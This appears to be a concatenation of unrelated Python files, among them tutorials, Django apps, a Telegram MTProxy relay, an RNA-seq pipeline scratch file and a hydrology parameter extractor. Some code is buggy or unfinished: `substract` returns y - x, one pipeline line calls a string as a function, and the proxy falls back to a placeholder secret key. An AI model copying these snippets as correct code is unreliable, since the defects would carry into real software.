layer2.add_module('conv_2', nn.Conv2d(32, 64, 3, 1, padding=1))
# b, 64, 16, 16
layer2.add_module('relu_2', nn.ReLU(True))
layer2.add_module('pool_2', nn.MaxPool2d(2, 2)) # b, 64, 8, 8
self.layer2 = layer2
layer3 = nn.Sequential()
layer3.add_module('conv_3', nn.Conv2d(64, 128, 3, 1, padding=1))
# b, 128, 8, 8
layer3.add_module('relu_3', nn.ReLU(True))
layer3.add_module('pool_3', nn.MaxPool2d(2, 2)) # b, 128, 4, 4
self.layer3 = layer3
layer4 = nn.Sequential()
layer4.add_module('fc_1', nn.Linear(2048, 512))
layer4.add_module('fc_relu1', nn.ReLU(True))
layer4.add_module('fc_2', nn.Linear(512, 64))
layer4.add_module('fc_relu2', nn.ReLU(True))
layer4.add_module('fc_3', nn.Linear(64, 10))
self.layer4 = layer4
def forward(self, x):
conv1 = self.layer1(x)
conv2 = self.layer2(conv1)
conv3 = self.layer3(conv2)
fc_input = conv3.view(conv3.size(0), -1)
fc_out = self.layer4(fc_input)
return fc_out
# 建立模型
model = SimpleCNN()
print(model)
a=torch.FloatTensor([[1,2,3],[4,5,6]])
print(a)
|
#!/bin/python3
from sys import stdin
key = ""
value = []
pom = 1
#TODO Move the first 'if' out of the 'for' loop as a single stdin read > DONE
firstRow = stdin.readline()
key = firstRow.split('\t')[0]
value.append(firstRow.split('\t')[1].replace("\n", ""))
for i in stdin:
if i.split('\t')[0] == key:
value.append(i.split('\t')[1].replace("\n", ""))
else:
print(key,"\t",value)
value = []
key = i.split('\t')[0]
value.append(i.split('\t')[1].replace("\n", ""))
print(key, "\t", value)
|
from django.conf.urls import url
from . import views
app_name="myapp"
urlpatterns = [
url(r'^$', views.addressbook),
url(r'^add/', views.add),
url(r'^upload/', views.upload),
url(r'^continue/', views.continueProcessCSV),
url(r'^truncate/', views.truncateTable),
url(r'^download/', views.downloadCSV),
]
|
from django.contrib import admin
from forum.models import *
# Register your models here.
##Admin
class ForumAdmin(admin.ModelAdmin):
pass
class ThreadAdmin(admin.ModelAdmin):
list_display = ["title", "forum", "created_by", "time"]
list_filter = ["forum","created_by"]
class PostAdmin(admin.ModelAdmin):
search_fields = ["title", "created_by"]
list_display = ["title","thread", "created_by","time"]
admin.site.register(Forum,ForumAdmin)
admin.site.register(Thread,ThreadAdmin)
admin.site.register(Post,PostAdmin)
|
import json
import datetime
import sys
sys.path.append('../../python')
import inject
inject.configure()
import logging
from model.registry import Registry
from model.connection.connection import Connection
from model.assistance.justifications.imapJustifier.imapJustifier import ImapJustifier
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
reg = inject.instance(Registry)
conn = Connection(reg.getRegistry('dcsys'))
con = conn.get()
try:
ImapJustifier.loadJustifications(con)
con.commit()
finally:
conn.put(con)
|
from math import pi
def circle_area(r):
if type(r) not in [int, float]:
raise TypeError("The radius must be a non-negative real number.")
if r < 0:
raise ValueError("The radius must not be negative.")
return pi*(r**2)
def rectangle_area(w,l):
if type(w) not in [int, float]:
raise TypeError("The width must be a non-negative real number.")
if w < 0:
raise ValueError("The width must not be negative.")
if type(l) not in [int, float]:
raise TypeError("The length must be a non-negative real number.")
if l < 0:
raise ValueError("The length must not be negative.")
return w*l
def square_area(a):
return rectangle_area(a,a)
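# Usage sketch: the validation raises on bad input, otherwise the area is returned.
if __name__ == "__main__":
    print(circle_area(2))        # 4*pi, about 12.566
    print(rectangle_area(3, 4))  # 12
    print(square_area(5))        # 25
    try:
        circle_area(-1)
    except ValueError as err:
        print(err)               # The radius must not be negative.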
|
def draw_stars(x):
for new in x:
star = new * "*"
print star
draw_stars([4, 6, 1, 3, 5, 7, 25])
# part 2
def stars2(arr):
for x in arr:
if isinstance(x, int):
print x * "*"
elif isinstance(x, str):
length = len(x)
letter = x[0].lower()
print letter * length
x = [4, "Tom", 1, "Michael", 5, 7, "Jimmy Smith"]
stars2(x)
|
# Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import pytest
from pants.backend.google_cloud_function.python.target_types import (
PythonGoogleCloudFunction,
PythonGoogleCloudFunctionRuntime,
)
from pants.backend.google_cloud_function.python.target_types import rules as target_type_rules
from pants.backend.python.target_types import PythonRequirementTarget, PythonSourcesGeneratorTarget
from pants.backend.python.target_types_rules import rules as python_target_types_rules
from pants.build_graph.address import Address
from pants.core.target_types import FileTarget
from pants.engine.target import InvalidFieldException
from pants.testutil.rule_runner import RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
rules=[
*target_type_rules(),
*python_target_types_rules(),
],
target_types=[
FileTarget,
PythonGoogleCloudFunction,
PythonRequirementTarget,
PythonSourcesGeneratorTarget,
],
)
@pytest.mark.parametrize(
["runtime", "expected_major", "expected_minor"],
(
# The available runtimes at the time of writing.
# See https://cloud.google.com/functions/docs/concepts/python-runtime.
["python37", 3, 7],
["python38", 3, 8],
["python39", 3, 9],
["python310", 3, 10],
["python311", 3, 11],
),
)
def test_to_interpreter_version(runtime: str, expected_major: int, expected_minor: int) -> None:
assert (expected_major, expected_minor) == PythonGoogleCloudFunctionRuntime(
runtime, Address("", target_name="t")
).to_interpreter_version()
@pytest.mark.parametrize("invalid_runtime", ("python88.99", "fooobar"))
def test_runtime_validation(invalid_runtime: str) -> None:
with pytest.raises(InvalidFieldException):
PythonGoogleCloudFunctionRuntime(invalid_runtime, Address("", target_name="t"))
|
# returns the last 2 characters of the string, repeated 3 times
def extra_end(str):
str2 = ""
for i in range(3):
str2 = str2 + str[-2:]
return str2
# first 2 characters
def first_two(str):
if len(str) >=2:
return str[0:2]
return str
'''
Return True if the string "cat" and "dog" appear the same number of times in the given string.
cat_dog('catdog') → True
cat_dog('catcat') → False
cat_dog('1cat1cadodog') → True
'''
def cat_dog(str):
cat = 0
dog = 0
for i in range(2,len(str)):
if str[i] == 't' and str[i-1] == 'a' and str[i-2] == 'c':
cat = cat + 1
if str[i] == 'g' and str[i-1] == 'o' and str[i-2] == 'd':
dog = dog + 1
if cat == dog:
return True
return False
# return how many times string code appears in string
# except we'll accept any letter for the 'd', so "cope" and "cooe" count.
def count_code(str):
code = 0
for i in range(3,len(str)):
if str[i] == 'e' and str[i-2] == 'o' and str[i-3] == 'c':
code = code + 1
return code
# compare end part of 2 strings
'''
Given two strings, return True if either of the strings appears at the very end of the other string,
ignoring upper/lower case differences (in other words, the computation should not be "case sensitive").
Note: s.lower() returns the lowercase version of a string.
end_other('Hiabc', 'abc') → True
end_other('AbC', 'HiaBc') → True
end_other('abc', 'abXabc') → True
'''
def end_other(a, b):
if len(a) > len(b) and a[-len(b)::].lower() == b.lower():
return True
elif len(b) > len(a) and b[-len(a)::].lower() == a.lower():
return True
elif a.lower() == b.lower():
return True
return False
'''
Find first occurence of a character in a string
return -1 if not found
'''
def findNeedle(str,needle):
for i in range(len(str)):
if str[i] == needle:
return i
return -1
print findNeedle("mystring","k")
|
def add(x, y):
"""ADD NUMBERS TO GETHER"""
return x + y
def substract(x, y):
"""SUB NUMBERS TO GETHER"""
return y - x
|
python ~/00script/BI_left/python/AutoStarRsem/C1Pipeline.py
PBMC0102_42ea;08PBMC0102_191213
trim_galore /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/PBMC0102_42ea/PBMC_2-59_1.fastq.gz /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/PBMC0102_42ea/PBMC_2-59_2.fastq.gz --paired --phred33 -o /media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/02trim/08PBMC0102_191213_191213
fastqc -o /media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/01QC/08PBMC0102_191213_191213/beforeQC /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/PBMC0102_42ea/PBMC_2-59_1.fastq.gz /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/PBMC0102_42ea/PBMC_2-59_2.fastq.gz
STAR --runThreadN 2 --genomeDir /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/00ref/STAR38 --sjdbGTFfile /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/00ref/ensembl/GRCh38/Homo_sapiens.GRCh38.97.gtf --sjdbOverhang 150 --outFilterType BySJout --outFilterMultimapNmax 20 --alignSJoverhangMin 8 --alignSJDBoverhangMin 1 --outFilterMismatchNmax 999 --outFilterMismatchNoverReadLmax 0.02 --alignIntronMin 20 --outFileNamePrefix /media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/03star/08PBMC0102_191213_191213/PBMC_2-59 --alignIntronMax 1000000 --alignMatesGapMax 1000000 --readFilesIn /media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/02trim/08PBMC0102_191213_191213/PBMC_2-59_1_val_1.fq.gz,/media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/02trim/08PBMC0102_191213_191213/PBMC_2-59_2_val_2.fq.gz --readFilesCommand zcat --quantMode TranscriptomeSAM
#========================================================================================================
# conda activate scrna
makebeforefastQC(project_name,rawFa,trimFa)
makeafterfastQC(project_name,rawFa,trimFa)
import os, glob, time
start=time.strftime("%y%m%d")
project_name="07SMC008_%s"%(start)
project_name="07SMC009_191209"
maindir="/media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/"
maindir="/media/cytogenbi1/D2C67EE7C67ECAED/"
rawFa=glob.glob("/media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/SMC009_30ea/*_1.fastq.gz")
trimFa=[]
for rline in rawFa:
trimdir="%s02trim/%s/"%(maindir,project_name)
trimfile=rline.split("/")[-1].replace("_1.fastq.gz","_1_val_1.fq.gz")
tline="%s%s"(trimdir,trimfile)
trimFa.append(tline)
trimFa=[a.split("/")[-1].split(outExtension)[0] for a in rawFa]
trimFa=glob.glob("%s02trim/%s/*_1_val_1.fq.gz"%(maindir,project_name))
############
/media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/02trim/07SMC009_191209/SMC_009-1_1_val_1.fq.gz
SMC_009-1_1.fastq.gz
#trimmed
trim1=glob.glob("%s/03trim/01CMC1113/*_1_val_1.fq.gz"%maindir)
print(len(trim1))
trim2=glob.glob("%s/03trim/02pbmc/*_1_val_1.fq.gz"%maindir)
print(len(trim2))
trim3=glob.glob("%s/03trim/03H69plate/*_1_val_1.fq.gz"%maindir)
print(len(trim3))
trim4=glob.glob("%s/03trim/04CMC1819/*_1_val_1.fq.gz"%maindir)
print(len(trim4))
trim5=glob.glob("%s/03trim/03H69C1/*_1_val_1.fq.gz"%maindir)
print(len(trim5))
trimFa=trim1+trim2+trim3+trim4+trim5
maindir="/media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/"
trimFa=glob.glob("%s02trim/07SMC008_191212/*_1_val_1.fq.gz"%maindir)
print("trimFa length = ", len(trimFa))
print("sum of trim1...trimN = ", len(trim1)+len(trim2)+len(trim3)+len(trim4)+len(trim5))
#================================================================================================================
## Merge QC results
#================================================================================================================
# for file in `ls *.zip`; do unzip "${file}" -d "${file:0:-4}"; done
qcf =glob.glob("/media/desktop-bi-16/D2C67EE7C67ECAED/BI/03qc/*/*/summary.txt")
qcline=[]
for files in qcf:
qcff=open(files)
qcline.append(qcff.readlines())
failD={}
qctotal =[]
for aa in qcline:
for bb in aa:
qctotal.append(bb)
if "fail" in bb:
break
ouf=open("/media/desktop-bi-16/D2C67EE7C67ECAED/BI/03qc/resQC190917.txt","w")
for aaa in qctotal:
if "FAIL" in aaa:
wrine = "%s:%s\n"%(aaa.split("\t")[2].strip("\n"),aaa.split("\t")[1])
print aaa.split("\t")[2].strip("\n"),":",aaa.split("\t")[1]
ouf.write(wrine)
ouf.close()
failD[aaa.split("\t")[2]]=aaa.split("\t")[1]
|
# coding=utf-8
import asyncio
import hashlib
import json
import os
from openssl import OpenSSLStreamCrypto
TG_SERVERS = ["149.154.175.50", "149.154.167.51", "149.154.175.100", "149.154.167.91", "149.154.171.5"]
class MTProxy(asyncio.Protocol):
def __init__(self, config):
super().__init__()
self.loop = asyncio.get_event_loop()
self.init = True
self.config = config
self.tg_servers = TG_SERVERS
self.to_local_queue = asyncio.Queue()
self.to_sender_queue = asyncio.Queue()
def connection_made(self, transport):
self.transport = transport
asyncio.ensure_future(self.start_send())
def data_received(self, data):
if self.init:
secret_bytes = bytes.fromhex(config.get("secret_key", "0123456789abcdef0123456789abcdef"))
buf64 = data[:64]
decrypt_key, decrypt_iv, encrypt_key, encrypt_iv = MTProxy.generate_key_iv(buf64=buf64)
decrypt_key = hashlib.sha256(decrypt_key + secret_bytes).digest()
encrypt_key = hashlib.sha256(encrypt_key + secret_bytes).digest()
self.decryptor = OpenSSLStreamCrypto("aes-256-ctr", key=decrypt_key, iv=decrypt_iv, op=0)
self.encryptor = OpenSSLStreamCrypto("aes-256-ctr", key=encrypt_key, iv=encrypt_iv, op=1)
decrypted_data = self.decryptor.decrypt(buf64)
self.dcID = abs(int.from_bytes(decrypted_data[60:62], "little", signed=True)) - 1
for i in range(4):
if decrypted_data[56 + i] != 0xef:
self.transport.close()
if self.dcID > 4 or self.dcID < 0:
self.transport.close()
asyncio.ensure_future(self.create_sender(self.dcID))
data = data[64:]
self.init = False
decrypted_data = self.decryptor.decrypt(data)
self.to_sender_queue.put_nowait(decrypted_data)
async def create_sender(self, dcid):
remote_addr = self.tg_servers[dcid], 443
_, self.sender = await self.loop.create_connection(lambda: SenderProtocol(self), *remote_addr)
async def start_send(self):
while True:
data = await self.to_local_queue.get()
encrypted_data = self.encryptor.encrypt(data)
self.transport.write(encrypted_data)
@classmethod
def generate_key_iv(cls, buf64):
key_iv = buf64[8:56]
# key's length:32bytes , iv's length:16bytes
decrypt_key, decrypt_iv = key_iv[:32], key_iv[32:]
# reverse bytes sequence
key_iv = key_iv[::-1]
encrypt_key, encrypt_iv = key_iv[:32], key_iv[32:]
return decrypt_key, decrypt_iv, encrypt_key, encrypt_iv
class SenderProtocol(asyncio.Protocol):
def __init__(self, client):
super().__init__()
self.client = client
self.handshaked = asyncio.Event()
def connection_made(self, transport):
self.transport = transport
self.handshake()
asyncio.ensure_future(self.start_send())
def data_received(self, data):
decrypted_data = self.decryptor.decrypt(data)
self.client.to_local_queue.put_nowait(decrypted_data)
def handshake(self):
random_buf = os.urandom(64)
check_list = [0x44414548, 0x54534f50, 0x20544547, 0x4954504f, 0xeeeeeeee]
while True:
            tmp1 = (random_buf[3] << 24) | (random_buf[2] << 16) | (random_buf[1] << 8) | (random_buf[0])
            tmp2 = (random_buf[7] << 24) | (random_buf[6] << 16) | (random_buf[5] << 8) | (random_buf[4])
if random_buf[0] != 0xef and (tmp1 not in check_list) and tmp2 != 0x00000000:
tmp_bytes_list = list(random_buf)
tmp_bytes_list[56] = tmp_bytes_list[57] = tmp_bytes_list[58] = tmp_bytes_list[59] = 0xef
random_buf = bytes(tmp_bytes_list)
break
random_buf = os.urandom(64)
# Be careful, The order of these variables is reversed compared to client's.
encrypt_key, encrypt_iv, decrypt_key, decrypt_iv = MTProxy.generate_key_iv(buf64=random_buf)
self.decryptor = OpenSSLStreamCrypto("aes-256-ctr", key=decrypt_key, iv=decrypt_iv, op=0)
self.encryptor = OpenSSLStreamCrypto("aes-256-ctr", key=encrypt_key, iv=encrypt_iv, op=1)
encrypted_data = self.encryptor.encrypt(random_buf)
encrypted_data = random_buf[:56] + encrypted_data[56:]
self.transport.write(encrypted_data)
self.handshaked.set()
async def start_send(self):
await self.handshaked.wait()
while True:
data = await self.client.to_sender_queue.get()
encrypted_data = self.encryptor.encrypt(data)
self.transport.write(encrypted_data)
try:
config = json.loads(open("config.json", 'r').read())
except Exception as e:
config = {"port": 443, "secret_key": "0123456789abcdef0123456789abcdef"}
port = config.get("port", 443)
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except Exception as e:
pass
loop = asyncio.get_event_loop()
local_addr = "0.0.0.0", port
coro = loop.create_server(lambda: MTProxy(config), *local_addr)
server = loop.run_until_complete(coro)
print('server created ', *local_addr)
try:
loop.run_forever()
except KeyboardInterrupt as e:
print('all tasks cancelled')
print(asyncio.gather(asyncio.Task.all_tasks()).cancel())
|
import contentful
from flask_paginate import Pagination, get_page_parameter
from flask import render_template, request
from decouple import config
########## CONTENTFUL ############
SPACE_ID = config('SPACE_ID')
ACCESS_TOKEN = config('ACCESS_TOKEN')
client = contentful.Client(SPACE_ID, ACCESS_TOKEN)
########## CONTENTFUL ############
PRODUCT_LIMIT = 36
class Products:
def search_product(self, search_query, search_form, skip_num):
products = client.entries({'limit': PRODUCT_LIMIT,
'content_type': 'samAndCoProducts',
'skip': skip_num,
'fields.title[match]': search_query})
page = request.args.get(get_page_parameter(), type=int, default=1)
pagination = Pagination(show_single_page= True, page=page, per_page=36, total=products.total, search=False, record_name='products')
return render_template('store.html', products=products, search_form=search_form, pagination=pagination)
# All Products
def all_products(self, skip_num):
products = client.entries({'limit': PRODUCT_LIMIT,
'content_type': 'samAndCoProducts',
'skip': skip_num})
print(products)
return products
#Sort by Category
def get_by_category(self, query, skip_num):
products = client.entries({'limit': PRODUCT_LIMIT,
'content_type': 'samAndCoProducts',
'skip': skip_num,
'fields.category[match]':query})
return products
def get_product_detail(self, product_id):
        product = client.entry(product_id)
return product
def get_discount_items(self):
products = client.entries({'content_type': 'samAndCoProducts',
'fields.category2[match]': 'discount'})
return products
|
#!/usr/local/bin/python3.8
# Methods are functions that are attached to items
# 'append' : append(<appended_item>)
my_list = [1, 2, 3]
my_list.append(4)
# 'insert' : insert(<position>, <appended_item>)
my_list.insert(0, 'a') # ['a', 1, 2, 3, 4]
# 'index' : tells you the position of an item
my_list = ['a', 1, 2, 3, 4]
my_list.index('a') # 0
# 'in' keyword finds whether something exists in a list
my_list = ['a', 1, 2, 3, 4]
'a' in my_list # True
'a' not in my_list # False
'b' in my_list # False
# 'sorted' function - returns a sorted copy of the list
my_list = [6, 8, 10, 4]
sorted(my_list) # [4, 6, 8, 10]
# 'reversed' function - reverses the list
my_list = [6, 8, 10, 4]
reversed(my_list) # not useful on its own: <list_reverseiterator object at 0x7f51ad4eea60>
list(reversed(my_list)) # useful list back: [4, 10, 8, 6]
## sort and reverse together # items must all be one comparable type, e.g. all int, all str, or all float
my_list = [6, 8, 10, 4]
list(reversed(sorted(my_list))) # [10, 8, 6, 4]
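# A quick sketch of the in-place counterpart: list.sort() mutates the list and returns None.
my_list = [6, 8, 10, 4]
my_list.sort()               # my_list is now [4, 6, 8, 10]
my_list.sort(reverse=True)   # my_list is now [10, 8, 6, 4]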
|
from panda3d.core import BoundingBox, Point3
# A collection of points
class PointCloud:
    def __init__(self, points=None):
        # Avoid a shared mutable default argument: each PointCloud gets its own list
        self.points = points if points is not None else []
self.calcBoundingBox()
def addPoint(self, point):
if point not in self.points:
self.points.append(point)
self.calcBoundingBox()
def removePoint(self, point):
if point in self.points:
self.points.remove(point)
self.calcBoundingBox()
def calcBoundingBox(self):
self.minX = None
self.minY = None
self.minZ = None
self.maxX = None
self.maxY = None
self.maxZ = None
mins = Point3(99999999)
maxs = Point3(-99999999)
for point in self.points:
if point.x < mins.x:
mins.x = point.x
if point.y < mins.y:
mins.y = point.y
if point.z < mins.z:
mins.z = point.z
if point.x > maxs.x:
maxs.x = point.x
if point.y > maxs.y:
maxs.y = point.y
if point.z > maxs.z:
maxs.z = point.z
if self.minX is None or point.x < self.minX.x:
self.minX = point
if self.minY is None or point.y < self.minY.y:
self.minY = point
if self.minZ is None or point.z < self.minZ.z:
self.minZ = point
if self.maxX is None or point.x > self.maxX.x:
self.maxX = point
if self.maxY is None or point.y > self.maxY.y:
self.maxY = point
if self.maxZ is None or point.z > self.maxZ.z:
self.maxZ = point
self.mins = mins
self.maxs = maxs
self.boundingBox = BoundingBox(self.mins, self.maxs)
self.extents = [
self.minX, self.minY, self.minZ,
self.maxX, self.maxY, self.maxZ
]
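# Minimal usage sketch (the point coordinates below are illustrative, not taken from the
# original code): build a cloud and read back the bounds computed by calcBoundingBox().
if __name__ == "__main__":
    cloud = PointCloud([Point3(0, 0, 0), Point3(1, 2, 3), Point3(-1, 5, 0.5)])
    print(cloud.mins, cloud.maxs)                                   # overall min/max corners
    print(cloud.boundingBox.getMin(), cloud.boundingBox.getMax())   # same bounds via BoundingBox
    cloud.addPoint(Point3(10, -4, 2))                               # bounds recalculate on add/remove
    print(cloud.extents)                                            # the six extreme points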
|
__author__ = 'apple'
# Get Shapefile Fields and Types - Get the user defined fields
from osgeo import ogr
daShapefile = r"ne1/ne1.shp" # Path your Shapefile
dataSource = ogr.Open(daShapefile)
daLayer = dataSource.GetLayer(0)
layerDefinition = daLayer.GetLayerDefn()
print "Name - Type Width Precision"
for i in range(layerDefinition.GetFieldCount()):
fieldName = layerDefinition.GetFieldDefn(i).GetName()
fieldTypeCode = layerDefinition.GetFieldDefn(i).GetType()
fieldType = layerDefinition.GetFieldDefn(i).GetFieldTypeName(fieldTypeCode)
fieldWidth = layerDefinition.GetFieldDefn(i).GetWidth()
GetPrecision = layerDefinition.GetFieldDefn(i).GetPrecision()
print fieldName + " - " + fieldType+ " " + str(fieldWidth) + " " + str(GetPrecision)
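# Illustrative follow-up (assumes the same daLayer as above): read the attribute
# values of the first feature for each of the fields just listed
feature = daLayer.GetNextFeature()
if feature is not None:
    for i in range(layerDefinition.GetFieldCount()):
        fieldName = layerDefinition.GetFieldDefn(i).GetName()
        print fieldName + " = " + str(feature.GetField(fieldName))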
|
from django.conf import settings
from django.db import models
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
class BlogPost(models.Model):
title = models.CharField(max_length=40, blank=False, null=False)
text = models.TextField(blank=False)
author = models.ForeignKey(settings.AUTH_USER_MODEL)
private = models.BooleanField(default=False)
creation_time = models.DateTimeField(auto_now=True)
def __unicode__(self):
return self.title
def get_absolute_url(self):
return reverse('blog_platform.views.display_blogpost', args=(self.author, self.slug))
class Meta:
verbose_name = _('BlogPost')
verbose_name_plural = _('BlogPosts')
|
import os
import tarfile
from art.command import run_command
multi_dir = os.path.realpath(os.path.join(os.path.dirname(__file__), "multi"))
files_per_name = {
"a": {".manifest.json", "a.txt", "aa/a2.txt"},
"b": {".manifest.json", "b.txt"},
}
def test_multi(tmpdir):
tmpdir = str(tmpdir)
suffix = "latest"
args = ["--dest", tmpdir, "--suffix", suffix, "--local-source", multi_dir]
run_command(args)
for name, files in files_per_name.items():
for file in files:
assert os.path.isfile(os.path.join(tmpdir, name, suffix, file))
tar_path = os.path.join(tmpdir, "a", suffix, "wrap.tar")
with tarfile.open(tar_path, "r") as tf:
assert set(tf.getnames()) == files_per_name["a"]
|
#Extract_Hydro_Params.py
#Ryan Spies
#ryan.spies@amec.com
#AMEC
#Description: extracts SAC-SMA/UNITHG/LAG-K parameter values
#from CHPS configuration .xml files located in the Config->ModuleConfigFiles
#directory and outputs a .csv file with all parameters
#Script was modified from Cody's original script
# NOTE: this script only works with the original CHPS SA moduleparfile .xml files...
# not the CHPS CALB parameter mods
#import script modules
import glob
import os
import re
import matplotlib.pyplot as plt
import numpy
from datetime import datetime
from matplotlib.ticker import AutoMinorLocator
from matplotlib.ticker import MultipleLocator
#-----------------------------------------------------------------------------
#START USER INPUT SECTION
#Enter RFC
RFC = 'APRFC'
param_source = 'pre_calb' # choices: 'pre_calb','sa'
#Turn on/off model parameter searches # choices: 'on' or 'off'
sac = 'off'
snow = 'on'
lag_k = 'off'
uh = 'off'
#Turn on/off plot choices
uh_plots = 'on' # choices: 'on' or 'off' -> UNIT-HG plots
lag_plots = 'off' # choices: 'on' or 'off' -> LAG/K plots
#END USER INPUT SECTION
#-----------------------------------------------------------------------------
homedir = os.getcwd()
if homedir[0:1] != 'P':
maindir = homedir[0:8]
else:
maindir = homedir[0:2]
print 'Script is Running...'
if param_source == 'pre_calb':
folderPath = maindir + '\\NWS\\chps_calb\\' + RFC.lower() + '_calb\\Config\\ModuleParFiles\\*'
if param_source == 'sa':
folderPath = maindir + '\\NWS\\chps_sa\\' + RFC.lower() + '_sa\\Config\\ModuleParFiles\\*'
#folderPath = maindir + '\\NWS\\chps_calb\\' + RFC.lower() + '_calb\\Config\\ModuleParFiles\\*'
#SAC-SMA SECTION--------------------------------------------------------------
#loop through SACSMA files in folderPath
if sac == 'on':
print 'Processing SAC-SMA parameters...'
if param_source == 'pre_calb':
csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_SACSMA_Params_' + param_source + '.csv', 'w')
if param_source == 'sa':
csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_SACSMA_Params_' + param_source + '.csv', 'w')
csv_file.write('BASIN,NAME,REXP,LZPK,LZFPM,PXADJ,RCI,PFREE,ZPERC,RIVA,MAPE_Input,PEADJ,LZTWM,'\
'RSERV,ADIMP,UZK,SIDE,LZFSM,LZSK,SMZC,UZTWM,UZFWM,PCTIM,EFC,'\
'JAN_ET,FEB_ET,MAR_ET,APR_ET,MAY_ET,JUN_ET,JUL_ET,AUG_ET,SEP_ET,OCT_ET,NOV_ET,DEC_ET' + '\n')
sac_line = 0; basin_count = 0
for filename in glob.glob(os.path.join(folderPath, "SAC*.xml")):
#print filename
basin_count += 1
#Define output file name
name = str(os.path.basename(filename)[:])
name = name.replace('SACSMA_', '')
name = name.replace('_UpdateStates.xml', '')
spl_name = name.split('_')[1]
#print name
csv_file.write(name + ',')
csv_file.write(spl_name + ',')
#Open .xml file and temporary .txt file to write .xml contents to
xml_file = open(filename, 'r')
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'w')
#Write contents of .xml file to the temporary .txt file
for line in xml_file:
txt_file.write(line)
#Close the open files
xml_file.close()
txt_file.close()
#Open .txt file with .xml contents in read mode and create output .txt file where parameters will be written
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'r')
output_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_SACSMA_Params.txt', 'w')
#Write data headers
output_file.write('PARAMETER,VALUE' + '\n')
###REXP
#Find line number with REXP value
#Line number is saved when loop breaks
line_num = 0
for line in txt_file:
line_num += 1
if 'REXP' in line:
break
#Set cursor back to beginning of txt_file that is being read
txt_file.seek(0)
#Section/line of .txt file with desired parameter value
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
#Write only numbers and decimals to output file
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('REXP,' + line + '\n')
###LZPK
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'LZPK' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('LZPK,' + line + '\n')
###LZFPM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'LZFPM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('LZFPM,' + line + '\n')
###PXADJ
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'PXADJ' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('PXADJ,' + line + '\n')
###RUNOFF_COMPONENT_INTERVAL
txt_file.seek(0)
line_num=0
if 'RUNOFF_COMPONENT_INTERVAL' not in txt_file.read():
csv_file.write('N/A' + ',')
output_file.write('RUNOFF_COMPONENT_INTERVAL,' + 'N/A' + '\n')
else:
txt_file.seek(0)
for line in txt_file:
line_num += 1
if 'RUNOFF_COMPONENT_INTERVAL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('RUNOFF_COMPONENT_INTERVAL,' + line + '\n')
###PFREE
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'PFREE' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('PFREE,' + line + '\n')
###ZPERC
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'ZPERC' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('ZPERC,' + line + '\n')
###RIVA
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'RIVA' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('RIVA,' + line + '\n')
###MAPE_Input
txt_file.seek(0)
line_num=0
if 'MAPE' not in txt_file.read():
csv_file.write('FALSE' + ',')
